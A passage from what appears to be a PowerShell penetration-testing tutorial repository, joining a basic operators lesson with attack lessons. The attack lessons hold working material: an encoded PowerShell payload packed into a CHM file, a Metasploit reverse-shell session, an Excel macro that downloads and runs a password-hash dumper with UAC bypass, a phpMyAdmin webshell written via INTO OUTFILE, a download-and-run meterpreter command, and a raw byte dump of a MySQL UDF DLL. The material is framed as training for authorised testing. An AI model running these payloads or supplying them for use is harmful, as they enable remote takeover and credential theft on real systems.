BvAG0AcAByAGUAcwBzACkAKQAsACAAWwBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AEEAUwBDAEkASQApACkALgBSAGUAYQBkAFQAbwBFAG4AZAAoACkAOwA= PS C:\Users\Administrator\Desktop\nishang-master> ``` ```PowerShell PS C:\Users\Administrator\Desktop\nishang-master> Out-CHM -Payload " -e SQBuAHYAbwBrAGUALQBFAHgAcAByAGUAcwBzAGkAbwBuACAAJAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABJAE8ALgBTAHQAcgBlAGEAbQBSAGUAYQBkAGUAcgAgACgAJAA oAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABJAE8ALgBDAG8AbQBwAHIAZQBzAHMAaQBvAG4ALgBEAGUAZgBsAGEAdABlAFMAdAByAGUAYQBtACAAKAAkACgATgBlAHcALQBPAGIAagBlAGMAdAAgAEkATwAuAE0AZQBtAG8AcgB5AFMAdAByAGUAYQBtACAAKAAsACQAKABbAE MAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACcAbgBWAFYAYgBiADUAcwB3AEYASAA2AFAAbABQAC8AZwBvAFUAaQBBAEYATQBoAHQAMwBhAFIATwBlAFYAagBUAFYAcQB2AGEAdABXAGkAMAB5AHEAUwBtAEQAdwA2AGMAQ gBLADkAZwBJADkAdQA1AG8ASwByAC8AZgBUAGEAWABoAHQARgBKAHkAdwBBAEoAWAA4ADcAeAArAFkANwBQADkAOQBtAHMATgBqAFMAUQBoAEYARgAwAHQANQBHAE8ASAB6AEUAdQBnADQAMwBzAGQAbAA2ADYAbgBXADQASABxAGUAZAB4AGwAbwBRAHgAeQBEAE4AQwBR ADAATABYAGwAdgAyAEUAUABNAHgAeABZAGgAVgBXAC8AUgB4ADYAagA3AGsASgBKAEgARABMAFkANABMAGsAWQBhAGQAbwAyAEUAZgBmAE0AUQAyAHgAWgBEAHgAVAB3ADkANABsAGoAZwBYAFkAVAA3AFYAbAB2AHUAUQBxAGQAbQAyAG0AZAA3AEUASABsAFEAWgBlAHg AcQBCAFcARwBMAFAAVAB4AFYAegBoAHMANQAxAFkAKwBKAG0AUQBrAEUAegBHADEAWQBUAEgAZABzAEQAOQBDAE8ASgA0AHMAUgAyADUAdwAwAFcAcQB4ADAASwBQAFgAZABpAEQAMABUADgAKwB6AFYARwBMAE4ARAAyAGMAeABRAHkASAAvADQARQB5AGIAbwAvAHkAOA BPAE8AbQBYADcARgB5AEQATgBTAGsAQgBkAFIAWAB2AHQANABrAFEASwBYADQAQQArAG4AdgA4AFQAKwAyAGkASwA5AEUAbABtADYAawBoADIAVwBrAGUAZQAyAGwAdQAzAEIAUgBhAFEANQBKAGgAaQA2AEoASQB0AHcASAB2AGcAWAB1AHgAdgBUAFoATwBDAEsATABrA HgAWgBaAGYARwBQAHkARwByAFMAMwBlAFgAbABpADUAaABqAC8AUQB2AG4AVQBBAHUAVQBxAFkASABSAHEAdwBqADYATgBHAFYAZgA3AFUAWABJADAAQwA2AGcASwB6AGkANABhAHMAcgBJACsAVgBCAHkAWABVAHkALwB2ADIAZABmADEAUQBrADYAaABlAGwAOQBtAHEA awA0AFIAQwBVAE8AZwB5AEMAbgBPAGkAcwByAFQAWQB6AEUASgBNAG4AUwBXAHAAVgBnAEkANQBGAEEAVwBzAHoAWABUAGIAYwByAFoAUwBsAGYAVwBDAGQARABWAHgAVQA5AGsAVwBiAGUAdwBjACsANgBXAHYAeQBDAFEANgBCAGEAawBPADQAZgBsAEwAQwBhAEsAZAB 0AHMAOQBaAHoAdQBxADQAWQByAHQAVwBHAFoATgBmAEsAWgB0AGYAegBrAEkAeABDAGgAUwBmAEMAMgBhADMAbAB4AEUAKwBTAGwAVQBhAGQAYQBDAE8AdwBGAEwAeQB1ADcAYwBEAHoAaABKAHAAWgB0ADcAbABZAHYAZQBxAEoAOABlAEEAcgBnAHoARABsAGgAQwBaAG IASgBxAGsAcgBFAGIAeQA5AHgANwB6AE4AZABRAHEAYQBsADIAWgB6AFQAOQB6AGsASABrADQAQQBXAFgAUgBsADEAeAA1AFQAVwBDAEgAbABKAEYATABxAEEAWgBTAHgATABGAGMAMAB3AG8ARwBNADAAbwA5AGQAcABQADAAZQBlAG0AVwBZAG4AcQBPAFIAZABWAEsAY QArAG0AWABjAHYAaABoAGcAVwA0AHkAaQBMAFgAUgAzAC8ANABEAHUAYQB0AHcAagBwAFUAVwBmADIAbQBqADQAKwAzAFkASgBYAGwAbQBIAE0AaQB3AFMAbQBxAGgASQB6ADcAUwBCADIAZwBhAG4AOAA1ADYAUgBFAFcAYQBBAGwASwBLAEQAdgBsAEsARgBXAHIAeABy AFcAaQBHAGwAcQBOAHIALwBwAFQALwB3AEUAZwA1ADgAQQA3AGkAcQBSAE0AVAB3AGUARAAwAGQARABWADcAMwBnAHkARwBTAFMARQBFAG8AZQBEAE8AcQBZAEMAMwBGAFMATQB1AHAAMwBmACcAKQApACkAKQAsACAAWwBJAE8ALgBDAG8AbQBwAHIAZQBzAHMAaQBvAG4 ALgBDAG8AbQBwAHIAZQBzAHMAaQBvAG4ATQBvAGQAZQBdADoAOgBEAGUAYwBvAG0AcAByAGUAcwBzACkAKQAsACAAWwBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AEEAUwBDAEkASQApACkALgBSAGUAYQBkAFQAbwBFAG4AZAAoACkAOwA=" -HHCPath 'C: \Program Files (x86)\HTML Help Workshop' Microsoft HTML Help Compiler 4.74.8702 Compiling c:\Users\Administrator\Desktop\nishang-master\doc.chm Compile time: 0 minutes, 0 seconds 2 Topics 4 Local links 4 Internet links 0 Graphics Created c:\Users\Administrator\Desktop\nishang-master\doc.chm, 14,838 bytes Compression decreased file by 1,046 bytes. PS C:\Users\Administrator\Desktop\nishang-master> ``` ```PowerShell PS C:\Users\Administrator\Desktop\nishang-master> ls .\doc.chm Directory: C:\Users\Administrator\Desktop\nishang-master Mode LastWriteTime Length Name ---- ------------- ------ ---- -a--- 7/17/2017 4:43 PM 14838 doc.chm PS C:\Users\Administrator\Desktop\nishang-master> ``` Running ```doc.chm``` will produce a ```Shortcut to File Server.lnk``` ```PowerShell PS C:\Users\Administrator\Desktop\nishang-master> ls '.\Shortcut to File Server.lnk' Directory: C:\Users\Administrator\Desktop\nishang-master Mode LastWriteTime Length Name ---- ------------- ------ ---- -a--- 7/17/2017 4:43 PM 1534 Shortcut to File Server.lnk PS C:\Users\Administrator\Desktop\nishang-master> ``` ![Image of Shortcut](images/20.jpeg) Run ```Shortcut to File Server.lnk``` ```sh root@kali:~# msfconsole msf > use exploit/multi/handler msf exploit(handler) > set PAYLOAD windows/shell/reverse_tcp PAYLOAD => windows/shell/reverse_tcp msf exploit(handler) > set LHOST 10.0.0.206 LHOST => 10.0.0.206 msf exploit(handler) > set LPORT 4444 LPORT => 4444 msf exploit(handler) > show options Module options (exploit/multi/handler): Name Current Setting Required Description ---- --------------- -------- ----------- Payload options (windows/shell/reverse_tcp): Name Current Setting Required Description ---- --------------- -------- ----------- EXITFUNC process yes Exit technique (Accepted: '', seh, thread, process, none) LHOST 10.0.0.206 yes The listen address LPORT 4444 yes The listen port Exploit target: Id Name -- ---- 0 Wildcard Target msf exploit(handler) > exploit [*] Started reverse TCP handler on 10.0.0.206:4444 [*] Starting the payload handler... [*] Encoded stage with x86/shikata_ga_nai [*] Sending encoded stage (267 bytes) to 10.0.0.233 [*] Command shell session 1 opened (10.0.0.206:4444 -> 10.0.0.233:17394) at 2017-07-17 19:43:33 -0400 whoami pfpt\administrator ``` ###### Running PowerShell scripts with elevation ```PowerShell PS C:\Users\Administrator\Desktop\nishang-master> Out-Excel -Payload "powershell.exe Start-Process -FilePath powershell.exe -ArgumentList ''-noexit -c IEX ((New-Object Net.WebClient).DownloadString(''''h ttp://10.0.0.233/Get-PassHashes.ps1''''));Get-PassHashes'' -Verb runas" Saved to file C:\Users\Administrator\Desktop\nishang-master\Salary_Details.xls 0 PS C:\Users\Administrator\Desktop\nishang-master> ``` ```PowerShell PS C:\Users\Administrator\Desktop\nishang-master> ls .\Salary_Details.xls Directory: C:\Users\Administrator\Desktop\nishang-master Mode LastWriteTime Length Name ---- ------------- ------ ---- -a--- 7/17/2017 5:14 PM 29696 Salary_Details.xls PS C:\Users\Administrator\Desktop\nishang-master> ``` Run ```Salary_Details.xls```, Bypass ```UAC``` and hashed for all users will be displayed in ```cmd``` ###### Reads - [Using PowerShell for Client Side Attacks](http://www.labofapenetrationtester.com/2014/11/powershell-for-client-side-attacks.html) - [DELIVERING A POWERSHELL PAYLOAD IN A CLIENT-SIDE ATTACK](https://enigma0x3.net/2014/01/11/using-a-powershell-payload-in-a-client-side-attack/) ================================================ FILE: 5-Operators.md ================================================ #### 5. Operators - Arithmetic (```+, -, *, /, %```) ```PowerShell PS C:\Users\Windows-32> 4+7 11 PS C:\Users\Windows-32> 5/3 1.66666666666667 PS C:\Users\Windows-32> 3-6 -3 PS C:\Users\Windows-32> 7*4 28 PS C:\Users\Windows-32> 16%9 7 PS C:\Users\Windows-32> ``` ```PowerShell PS C:\Users\Windows-32> "Hello" + " World" Hello World PS C:\Users\Windows-32> ``` ```PowerShell PS C:\Users\Windows-32> "Hello" + 5 Hello5 PS C:\Users\Windows-32> ``` ```PowerShell PS C:\Users\Windows-32> 5 + "Hello" Cannot convert value "Hello" to type "System.Int32". Error: "Input string was not in a correct format." At line:1 char:4 + 5 + <<<< "Hello" + CategoryInfo : NotSpecified: (:) [], RuntimeException + FullyQualifiedErrorId : RuntimeException PS C:\Users\Windows-32> ``` - Assignment (```=, +=, -=, *=, /=, %=```) ```PowerShell PS C:\Users\Windows-32> $a = 4 ``` ```PowerShell PS C:\Users\Windows-32> $a *= 6 PS C:\Users\Windows-32> $a 24 PS C:\Users\Windows-32> ``` ```PowerShell PS C:\Users\Windows-32> $a += 4 PS C:\Users\Windows-32> $a 28 PS C:\Users\Windows-32> ``` ```PowerShell PS C:\Users\Windows-32> $a -= 10 PS C:\Users\Windows-32> $a 18 PS C:\Users\Windows-32> ``` ```PowerShell PS C:\Users\Windows-32> $a /= 4 PS C:\Users\Windows-32> $a 4.5 PS C:\Users\Windows-32> ``` ```PowerShell PS C:\Users\Windows-32> $a %= 2 PS C:\Users\Windows-32> $a 0.5 PS C:\Users\Windows-32> ``` - Comparison (```-eq, -ne, -gt, -lt, -le, -ge, -match, -notmatch, -replace, -like, -notlike, -in, -notin, -contains, -notcontains```) ```PowerShell PS C:\Users\Windows-32> 6 -eq 5 False PS C:\Users\Windows-32> 5 -eq 5 True PS C:\Users\Windows-32> ``` ```PowerShell PS C:\Users\Windows-32> 5 -gt 3 True PS C:\Users\Windows-32> 5 -gt 7 False PS C:\Users\Windows-32> ``` ```PowerShell PS C:\Users\Windows-32> "Hello PowerShell" -match "power" True PS C:\Users\Windows-32> "Hello PowerShell" -match "Power" True PS C:\Users\Windows-32> ``` ```PowerShell PS C:\Users\Windows-32> "Hello PowerShell" -replace "Shell" Hello Power PS C:\Users\Windows-32> "Hello PowerShell" -replace "shell" Hello Power PS C:\Users\Windows-32> "Hello PowerShell" -replace "Shell","Bell" Hello PowerBell PS C:\Users\Windows-32> ``` ```PowerShell PS C:\Users\Administrator> "lo" -in "lower" False PS C:\Users\Administrator> "lo" -in "lo" True PS C:\Users\Administrator> ``` ```PowerShell PS C:\Users\Administrator> 1 -in 1,2,3 True PS C:\Users\Administrator> 4 -in 1,2,3 False PS C:\Users\Administrator> ``` - Redirection(```>, >>, 2> and 2>&1```) Stream | Number ---------|-------- Pipeline | 1> Error | 2> Warning | 3> Debug | 4> ```PowerShell PS C:\Users\Windows-32> Get-Location Path ---- C:\Users\Windows-32 PS C:\Users\Windows-32> Get-Location > loc.txt PS C:\Users\Windows-32> cat .\loc.txt Path ---- C:\Users\Windows-32 PS C:\Users\Windows-32> ``` ```PowerShell PS C:\Users\Windows-32> cd .. PS C:\Users> Get-Location >> .\Windows-32\loc.txt PS C:\Users> Get-Content .\Windows-32\loc.txt Path ---- C:\Users\Windows-32 Path ---- C:\Users PS C:\Users> ``` ```PowerShell PS C:\Users> Get-Process none,explorer 2>&1 Get-Process : Cannot find a process with the name "none". Verify the process name and call the cmdlet again. At line:1 char:12 + Get-Process <<<< none,explorer 2>&1 + CategoryInfo : ObjectNotFound: (none:String) [Get-Process], ProcessCommandException + FullyQualifiedErrorId : NoProcessFoundForGivenName,Microsoft.PowerShell.Commands.GetProcessCommand Handles NPM(K) PM(K) WS(K) VM(M) CPU(s) Id ProcessName ------- ------ ----- ----- ----- ------ -- ----------- 774 24 26976 22140 189 4.27 988 explorer PS C:\Users> ``` ###### Exercise - Explore the PowerShell help system and locate help topics for various operators ================================================ FILE: 50-PHPMyAdmin-Part-1.md ================================================ #### 50. PHPMyAdmin Part 1 ###### Exploitation – phpMyAdmin - Assumptions - Username / Password of phpMyAdmin is known - Writable directories on the web server are known - From phpMyAdmin access to SYSTEM privileges - Check OS ``` SHOW VARIABLES LIKE "%version%"; ``` - Create webshell ``` SELECT '' INTO OUTFILE 'C:\\inetpub\\wwwroot\\phpmyadmin\\config\\shell.php' ``` ``` http://newpc/phpmyadmin/config/shell.php?e=whoami ``` - Get a meterpreter [```Invoke-ShellCode```](https://github.com/PowerShellMafia/PowerSploit/blob/master/CodeExecution/Invoke-Shellcode.ps1) ``` http://newpc/phpmyadmin/config/shell.php?e=C:\Windows\Syswow64\Windowspowershell\v1.0\powershell.exe -c iex((New-Object Net.WebClient).DownloadString('http://192.168.254.1/Invoke-ShellCode.ps1'));Invoke-ShellCode -Payload windows/meterpreter/reverse_https -LHOST 192.168.254.226 -LPORT 8443 -Force ``` ###### Read - [Putting the MY in phpMyAdmin](https://pen-testing.sans.org/blog/pen-testing/2013/04/10/putting-the-my-in-phpmyadmin) ================================================ FILE: 51-PHPMyAdmin-Part-2.md ================================================ #### 51. PHPMyAdmin Part 2 - Identify the ```plugin directory``` ``` SELECT @@plugin_dir ``` - Convert the ```DLL``` to ```bytes``` - [```UDF DLL from sqlmap```](https://github.com/sqlmapproject/sqlmap/tree/master/udf/mysql/windows) ```PowerShell PS C:\Users\Administrator\Desktop> . .\Convert-Dll.ps1 ``` ```PowerShell PS C:\Users\Administrator\Desktop> Get-Help Convert-Dll NAME Convert-Dll SYNOPSIS Nishang script to convert an executable to text file. SYNTAX Convert-Dll [-DllPath] [-OutputPath] [] DESCRIPTION This script converts and an executable to a text file. RELATED LINKS http://www.exploit-monday.com/2011/09/dropping-executables-with-powershell.html https://github.com/samratashok/nishang REMARKS To see the examples, type: "get-help Convert-Dll -examples". For more information, type: "get-help Convert-Dll -detailed". For technical information, type: "get-help Convert-Dll -full". For online help, type: "get-help Convert-Dll -online" PS C:\Users\Administrator\Desktop> ``` ```PowerShell PS C:\Users\Administrator\Desktop> Get-Help Convert-Dll -Examples NAME Convert-Dll SYNOPSIS Nishang script to convert an executable to text file. -------------------------- EXAMPLE 1 -------------------------- PS >ExetoText C:\binaries\evil.exe C:\test\evil.txt PS C:\Users\Administrator\Desktop> ``` ```PowerShell PS C:\Users\Administrator\Desktop> Convert-Dll -DllPath .\lib_mysqludf_sys.dll_ -OutputPath dll.txt ``` ```PowerShell PS C:\Users\Administrator\Desktop> ls .\dll.txt Directory: C:\Users\Administrator\Desktop Mode LastWriteTime Length Name ---- ------------- ------ ---- -a--- 7/18/2017 4:43 PM 34184 dll.txt PS C:\Users\Administrator\Desktop> ``` - Write to the ```plugin directory``` of the ```server``` ``` SELECT CHAR(77,90,144...) INTO OUTFILE 'C:\\Program Files\\MySQL\\MySQL Server 5.6\\lib\\plugin\\lib_mysqludf_ sys.dll' FIELDS ESCAPED BY '' ``` ``` SELECT CHAR(7,156,237,69,114,11,147,42,150,80,0,165,82,173,54,116,193,130,107,65,53,31,170,113,90,91,10,83,148,53,61,36,249,117,32,177,61,86,98,120,114,22,242,149,57,211,91,1,249,130,11,214,14,233,121,57,13,158,241 ,15,9,99,197,157,70,142,142,174,199,157,14,149,70,236,102,193,14,180,181,98,53,181,178,122,156,181,138,24,58,197,217,212,162,43,198,92,140,186,243,237,2,64,54,44,117,24,66,24,8,24,66,24,252,224,229,222, 8,223,2,247,221,4,223,2,247,221,80,22,227,82,4,145,126,94,27,132,166,22,119,98,59,236,14,161,255,254,102,135,9,197,252,231,175,63,255,146,247,218,130,131,69,233,181,122,205,98,129,168,111,46,194,219,107 ,16,167,224,243,134,61,30,42,23,147,122,90,105,109,125,94,161,238,166,141,61,24,216,80,40,107,105,230,219,184,115,231,203,96,157,186,235,241,248,129,11,116,3,29,70,111,163,111,98,248,126,133,211,23,191, 54,190,15,63,165,67,0,8,224,4,148,158,0,31,68,133,179,71,0,110,239,104,44,184,94,224,235,95,242,81,214,185,169,97,94,255,112,12,47,228,40,241,10,108,9,148,118,211,245,6,119,106,60,24,105,163,42,206,129, 112,116,58,8,234,111,199,245,119,153,200,120,154,128,23,88,12,158,243,87,102,9,233,210,147,210,31,21,159,163,203,62,121,136,15,42,93,180,146,244,183,93,180,159,136,19,61,168,60,151,165,15,27,210,212,175 ,254,216,30,170,238,242,195,106,170,188,60,122,39,27,225,117,106,76,68,178,96,126,180,170,47,252,33,213,116,186,49,24,77,46,126,202,248,87,253,184,224,0,122,28,60,92,89,57,160,238,86,155,194,215,44,110, 30,140,212,198,89,206,24,155,194,231,170,47,162,138,112,14,159,19,229,186,82,190,107,159,99,115,251,184,136,119,151,8,205,107,190,213,151,247,196,32,247,108,32,129,212,89,110,155,158,39,128,47,60,125,12 6,246,12,138,185,13,126,253,102,60,82,128,254,148,161,90,128,65,204,47,126,208,120,102,37,17,1,206,244,92,63,219,221,118,151,2,191,174,207,209,211,72,196,96,31,234,206,136,254,219,118,209,8,12,209,216,2 44,2,192,31,33,118,200,136,13,102,12,205,191,73,122,119,6,143,20,158,4,63,72,112,244,19,192,51,25,3,133,81,25,105,241,234,220,7,106,138,229,99,214,233,31,82,111,40,147,38,163,5,29,141,170,118,245,175,15 5,47,223,193,213,135,245,150,242,245,202,30,189,58,19,189,20,63,253,161,172,199,181,46,140,159,126,44,215,37,101,240,155,93,206,211,172,16,205,56,55,194,92,226,238,158,216,106,93,150,19,50,160,132,103,2 39,104,190,215,88,89,238,182,217,157,66,29,3,47,20,192,32,156,4,57,196,208,16,192,2,226,249,28,162,73,152,152,206,184,134,89,66,29,29,139,82,8,76,38,92,190,61,223,127,29,241,159,212,50,29,178,208,255,17 7,166,137,184,187,202,193,237,234,9,70,210,9,10,139,113,238,187,238,89,56,218,8,221,205,142,140,239,186,36,99,204,8,251,10,93,222,29,179,147,10,66,2,220,22,234,37,144,158,195,164,183,25,164,16,157,144,2 22,225,55,4,173,68,226,55,4,173,4,120,60,133,54,93,120,35,75,28,128,228,109,83,101,78,53,53,69,189,25,98,133,253,109,108,20,83,196,60,171,31,177,135,64,162,139,237,11,111,178,126,176,66,107,171,90,139,2 37,26,168,122,115,216,56,115,55,212,150,51,37,193,209,147,213,161,254,138,159,86,104,14,124,119,96,43,12,75,20,146,172,106,239,80,239,155,228,48,78,161,218,83,155,217,198,173,121,237,239,123,28,65,104,2 41,121,52,98,121,26,143,138,184,184,94,185,197,174,52,197,117,200,41,5,128,227,42,72,73,99,73,218,30,11,114,244,73,124,163,203,119,108,13,44,100,77,83,88,220,184,105,23,56,112,100,52,144,25,2,2,81,177,1 55,168,134,42,36,149,184,80,173,94,137,207,130,11,3,101,39,15,65,69,80,98,156,143,204,203,123,231,48,230,26,130,12,223,188,51,15,254,7,33,89,71,255,1,222,59,15,238,153,8,201,224,204,248,28,173,133,134,1 66,167,107,148,218,72,201,96,174,150,205,238,25,247,89,8,139,216,2,198,17,91,69,155,242,190,114,192,217,80,89,9,217,123,92,177,238,22,219,49,128,135,55,57,105,108,48,219,93,208,22,196,159,128,203,75,20, 86,145,136,16,178,136,54,20,119,11,168,8,158,134,133,59,67,174,38,191,95,113,55,53,73,225,6,59,133,192,57,165,75,235,20,132,186,187,56,18,104,108,64,181,18,90,235,193,30,128,92,145,188,219,89,192,129,71 ,0,19,10,13,203,125,50,51,9,62,59,99,197,88,75,235,124,79,193,141,135,196,27,179,50,111,114,56,234,240,127,149,158,51,52,151,240,239,232,125,10,248,2,205,101,25,210,28,191,111,78,151,142,32,211,172,221, 63,221,6,124,224,51,10,10,65,38,211,157,172,179,193,101,0,89,155,234,236,161,52,195,102,11,88,174,103,76,185,112,215,92,136,177,195,93,190,143,69,63,11,113,165,172,31,188,216,221,48,67,228,190,205,2,171 ,4,139,231,73,230,194,172,43,57,159,151,110,154,5,1,54,188,149,144,7,131,23,248,190,133,155,140,40,137,248,35,34,45,11,157,4,198,2,144,35,177,59,122,3,140,216,238,99,212,172,7,113,46,191,197,93,110,139, 139,58,3,59,196,92,154,245,199,40,110,187,155,18,162,148,75,185,233,1,75,219,202,90,252,170,12,208,6,3,160,206,89,144,227,121,251,115,12,227,175,128,6,56,75,20,245,99,105,136,81,109,136,50,91,251,244,21 9,66,108,69,147,248,55,34,118,179,198,111,98,84,191,87,128,73,137,248,140,136,235,82,154,26,79,20,164,189,221,67,0,104,189,96,196,234,194,72,175,57,87,41,91,246,246,37,218,207,247,21,37,51,255,199,65,17 7,8,208,77,5,98,71,139,231,199,60,55,56,244,5,150,234,194,83,249,90,193,108,89,255,45,117,73,110,176,251,27,204,148,172,213,141,82,107,227,116,46,21,41,113,78,181,15,114,128,212,70,108,197,151,125,55,25 3,126,65,168,170,75,40,138,103,125,181,106,67,220,30,110,108,68,53,164,196,41,129,59,179,155,158,17,167,214,136,48,54,7,180,250,114,243,238,85,208,127,155,101,62,215,234,126,243,253,116,137,65,111,50,24 ,108,166,106,63,146,58,19,35,27,167,169,170,74,8,204,93,41,247,169,12,113,165,115,59,231,248,19,178,220,184,23,254,42,233,44,106,31,232,251,28,70,238,223,146,163,128,50,4,161,96,191,160,40,205,135,95,22 9,163,212,179,160,233,232,28,91,47,15,30,178,130,204,114,207,89,145,0,53,132,106,8,66,55,165,104,121,233,63,203,19,13,132,190,148,240,71,156,117,78,254,46,17,60,245,102,229,105,14,249,112,144,250,137,25 ,141,192,168,184,188,97,169,96,136,184,110,184,203,54,159,248,19,76,62,109,245,55,68,126,146,174,161,146,117,232,39,161,181,130,179,3,38,125,52,41,0,110,76,54,213,227,234,64,53,248,116,118,191,64,246,47 ,124,97,130,12,79,155,51,152,62,26,152,49,80,161,224,124,127,137,154,126,248,172,171,65,20,222,253,65,46,242,222,154,151,160,64,250,121,93,134,143,254,158,107,126,159,235,204,187,120,47,150,159,240,217, 169,158,250,17,54,198,44,247,83,161,158,77,14,56,18,36,61,188,174,105,79,64,221,116,100,71,9,124,27,115,251,19,186,171,179,126,115,152,41,126,112,225,49,181,153,119,12,19,104,79,156,80,161,115,86,127,16 9,5,108,225,154,189,132,42,15,213,24,28,249,93,156,140,4,50,76,136,94,203,20,19,127,212,122,192,3,106,95,169,0,76,210,122,139,101,14,255,243,5,37,98,63,97,208,193,136,25,37,247,82,7,137,161,169,140,98,1 38,160,50,91,247,15,147,132,253,182,41,109,42,17,112,70,225,2,60,38,177,106,161,177,229,17,89,88,184,126,143,227,207,90,252,238,16,136,140,59,20,85,30,98,133,178,12,247,241,39,241,13,235,38,192,29,249,2 06,147,63,97,2,133,249,50,74,197,64,215,199,156,144,41,215,150,176,212,151,171,114,227,145,123,156,213,221,88,213,102,109,65,140,223,128,221,54,42,254,167,166,165,201,230,34,54,59,125,135,112,122,192,10 3,73,107,215,11,177,235,95,191,82,131,78,231,14,77,214,55,12,84,239,140,0,169,22,109,81,2,104,142,12,92,119,159,158,97,15,20,88,9,20,160,136,25,136,34,159,145,218,120,204,231,56,174,101,35,248,85,1,76,1 26,137,43,157,116,69,65,6,90,211,209,146,25,52,235,69,150,124,41,18,177,118,124,166,243,139,200,139,95,87,219,151,201,85,204,129,91,177,184,183,244,50,189,28,100,240,122,252,150,136,64,126,16,196,51,169 ,151,115,59,227,126,3,130,33,180,153,116,146,35,143,163,248,207,154,57,231,52,79,191,251,204,97,59,183,191,30,78,137,174,223,39,201,188,210,53,216,65,118,228,183,214,147,36,163,217,182,149,148,39,173,86 ,72,201,211,160,87,23,126,170,95,213,82,61,73,172,162,118,117,109,189,55,134,236,123,12,110,172,35,51,154,65,34,196,89,192,122,93,145,205,175,131,205,199,95,206,70,152,69,116,101,142,149,137,7,151,141,8 5,144,79,245,83,89,29,7,72,222,124,166,153,101,104,211,171,242,201,197,148,225,53,93,115,248,247,77,254,146,197,91,43,64,134,40,142,67,92,234,102,79,165,19,83,180,30,194,64,219,216,178,98,128,255,108,19 9,92,154,245,179,153,111,52,166,214,58,252,150,50,173,120,106,200,90,240,135,153,212,124,40,206,93,97,7,104,69,241,101,120,79,62,144,78,190,197,244,224,114,195,192,243,27,86,154,240,32,153,54,175,85,162 ,83,201,143,54,154,159,56,245,192,153,174,42,161,49,82,67,12,74,153,6,11,89,44,126,252,0,62,139,50,135,69,56,179,1,119,180,177,4,113,229,109,249,255,113,135,24,80,15,191,55,185,96,205,15,227,194,88,87,2 29,1,49,14,209,153,92,76,22,5,151,168,159,30,16,170,45,251,244,75,82,145,66,170,210,172,120,86,183,233,206,171,118,46,178,185,75,235,147,140,178,102,87,19,62,80,157,208,199,235,26,13,72,173,129,39,108,9 4,47,4,206,143,23,56,216,122,74,46,108,139,201,45,195,83,226,162,154,80,94,67,198,160,222,73,144,240,213,20,195,29,188,80,40,172,1,56,249,87,187,194,205,158,8,210,53,231,189,254,106,230,50,186,207,14,23 9,161,198,36,160,242,37,158,171,101,156,47,190,249,196,149,47,151,71,4,186,151,147,175,113,29,122,207,48,215,147,209,155,52,204,112,244,252,177,16,55,242,185,40,214,68,120,90,3,35,77,244,186,205,207,185 ,25,214,155,159,20,205,38,155,148,47,54,66,99,210,6,248,230,125,169,250,184,146,143,221,185,134,151,165,234,30,197,236,214,5,197,7,16,6,2,245,171,202,4,27,122,220,155,165,126,241,137,132,4,165,27,30,219 ,4,101,188,57,115,166,17,120,120,129,238,26,141,215,246,73,224,30,61,217,60,35,121,91,76,9,217,5,44,243,207,112,199,48,233,198,244,233,235,34,36,91,204,128,189,36,43,51,64,32,87,89,159,80,210,207,142,10 2,91,190,207,148,147,131,117,42,53,205,60,76,55,168,62,106,2,2,14,69,24,25,252,32,194,203,24,211,201,122,132,236,183,62,18,252,146,227,231,239,83,6,248,37,45,107,63,178,104,207,112,195,214,246,195,240,2 16,9,45,170,217,74,235,170,29,33,107,20,214,254,93,45,179,141,75,71,48,21,214,158,83,252,133,93,41,216,42,165,118,120,138,200,185,223,29,171,146,156,88,197,131,101,2,128,178,15,59,67,232,228,203,54,213, 239,55,230,186,110,86,46,186,158,188,187,157,64,126,152,180,95,157,225,217,105,21,139,65,83,93,73,158,161,159,96,211,207,14,250,6,142,1,121,233,231,18,58,164,3,28,231,164,97,60,193,253,150,132,120,221,2 41,247,80,184,64,60,57,118,96,44,24,184,177,84,183,209,215,27,67,64,93,102,142,137,190,92,210,194,28,114,190,190,181,7,89,43,216,181,105,83,230,138,134,10,185,159,185,114,25,181,192,252,20,183,94,1,21,3 5,220,88,102,142,55,206,40,31,24,23,39,143,113,1,121,38,142,248,185,110,187,225,87,193,192,177,43,125,172,202,242,176,182,232,11,110,84,91,34,155,152,159,64,91,165,30,162,110,21,6,98,206,50,75,218,45,14 1,144,84,137,188,36,88,104,19,102,254,126,44,163,192,77,74,227,202,115,176,131,9,225,210,211,179,215,211,70,120,187,171,224,214,237,78,64,208,139,225,96,28,255,223,255,138,225,155,231,20,252,140,32,199, 31,206,8,103,156,197,161,157,195,254,85,121,159,225,240,110,113,8,14,216,193,30,76,135,84,71,35,204,30,78,135,159,33,207,224,119,135,253,99,238,231,240,86,113,223,170,154,172,32,126,167,207,225,240,12,1 74,40,98,239,223,194,225,66,99,238,225,240,62,113,96,225,240,60,65,239,18,113,135,70,3,153,195,253,99,254,124,135,4,70,220,195,225,66,99,170,99,222,206,225,41,113,36,71,35,207,161,131,175,251,233,58,246 ,35,238,14,205,226,223,76,32,244,216,34,140,65,204,225,250,176,224,42,182,197,69,229,144,101,106,188,193,31,248,81,217,80,148,199,252,237,84,132,31,160,205,211,217,106,189,76,119,66,48,180,84,234,118,13 2,218,195,40,12,70,104,112,117,219,26,90,101,119,135,123,4,133,189,194,118,16,246,68,93,178,48,122,38,242,113,175,48,114,9,118,225,144,83,59,42,90,111,218,89,168,34,110,38,136,7,106,16,167,172,202,117,1 47,72,133,32,189,84,52,179,172,241,19,102,237,30,58,119,129,148,83,30,181,225,39,208,80,144,223,118,136,78,65,175,85,116,157,13,24,39,233,130,74,148,175,224,72,34,22,126,85,237,159,142,53,213,3,43,218,1 56,135,53,84,12,46,169,28,246,248,149,167,172,195,179,173,185,200,117,11,171,64,112,38,129,17,221,47,212,12,186,148,189,31,3,116,33,53,242,224,106,10,231,3,121,104,63,223,115,15,255,3,81,215,156,131,204 ,254,22,200,35,118,208,78,66,162,84,208,163,125,34,110,210,229,232,46,142,60,223,43,196,160,157,200,92,251,29,152,139,47,127,218,95,159,159,24,212,94,227,21,132,210,227,112,126,3,122,218,248,3,121,10,3, 35,151,16,59,249,160,36,190,92,88,13,241,156,211,164,9,177,77,156,61,170,44,65,232,148,139,204,100,166,56,224,117,59,167,224,113,72,60,149,26,172,123,100,111,195,36,161,141,195,158,81,200,213,163,220,20 2,251,166,210,154,239,159,75,16,9,217,75,27,209,253,111,229,157,154,73,19,234,78,59,244,36,129,96,244,91,32,142,79,253,13,168,1,186,26,57,180,51,205,161,9,12,64,216,8,41,25,197,79,137,2,7,4,107,174,155, 